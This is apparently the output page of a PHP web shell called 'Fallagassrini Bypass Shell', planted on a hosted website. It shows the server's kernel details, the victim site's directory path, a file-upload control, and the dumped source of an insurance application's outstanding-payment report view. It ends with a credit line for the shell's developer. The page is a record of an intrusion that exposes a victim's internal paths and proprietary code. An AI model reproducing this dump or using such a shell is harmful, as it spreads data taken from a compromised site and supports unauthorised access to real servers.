? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/piadraft/system/application/views/Report/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/piadraft/system/application/views/Report/outstandingstfwiserep.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?> <?php
 if ($search == "")
            $search = 'search';

        if($fromdate == '')
            $fromdate = 'fromdate';
        if($todate=='')
            $todate = 'todate';



$cov=$this->mastermodel->get_data_srow('staffpersonaldetails',$search,'id');
 $branchname1 = $this->mastermodel->get_newbranchname($search);
?>

<div class="select-bar"> <table width="100%"><tr><td><label>
    <img src="<?=base_url()?>/assets/images/backbutton.png" title="Back" class="clickimage"  onclick="loadpayment()" alt="Back" align = "center" width="25" height="25"  /></label>
            </td><td align="center">
Outstanding Payment Report
</td><td align="right">
    <label><?=anchor('report/genrepoutstandingstf/outstandingstfwisepdf/'.$search.'/'.$fromdate.'/'.$todate.'/', '<img src="'.base_url().'/assets/images/pdf.png" title="PDF" align = "center" width="20" height="20">',array('class'=>'delete','onclick'=>"return confirm('Are you sure want to download')"))?></label>
	  &nbsp;&nbsp;&nbsp;    <label><?=anchor('report/genrepoutstandingstf/outstandingstfwisexls/'.$search.'/'.$fromdate.'/'.$todate.'/', '<img src="'.base_url().'/assets/images/excel.png" title="Excel" align = "center" width="20" height="20">',array('class'=>'dload','onclick'=>"return confirm('Are you sure want to download')"))?></label>
</td></tr></table></div>


<table class="reportheader"><tr><td>Employee Name</td><td><?=$cov->name?></td></tr>
    <tr><td>Employee No</td><td><?=$cov->employeeid?></td></tr>
    <tr><td>Branch</td><td><?=$branchname1?></td></tr>
    <?if ($todate != 'todate'){ ?> <tr><td>Period</td><td>   <?=$fromdate?> to <?=$todate?> </td></tr><? } ?>
</table>


<table class="sort"><thead><tr>
                                  <th>Sl No</th>
                                  <th>Date</th>
                                  <th>Quotation Ref</th>

                                  <th>Customer Name</th>
                                  <th>Status</th>
                                   <th>Premium</th>
                                  <th>Paid Amount</th>
                                  <th>Balance</th>


                              </tr>


<?php
    $i=1;
foreach($viewinfo as $updata)
{
if($updata['quotation_ref'] != "")
{
       $type=$this->customermodel->getSingleFieldValue('customers','type','id',$updata['customer_id']);
   if($type=="Individual")
	      {
                  $cus=$this->mastermodel->get_data_srow('customer_personal_ind',$updata['customer_id'],'customer_id');
              }
              else {
                   $cus=$this->mastermodel->get_data_srow('customer_corp_info',$updata['customer_id'],'customer_id');
              }
	     ?>
                            <tr>
                                <td><?=$i++;?></td>
                                <td><?php echo $this->mastermodel->convdatformat($updata['quotation_date']);?></td>
                                <td><?=$updata['quotation_ref'];?></td>

                                <td><?=$cus->insured;?></td>

                                <td><?=$updata['status'];?></td>

                               <td><?=$updata['premium'];?></td>
                                <td><?=$updata['totalamount'];?></td>
                                <td><?=($updata['premium']-$updata['totalamount']);?></td>

                            </tr>



<?php
}
}
?>
</table>
   

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net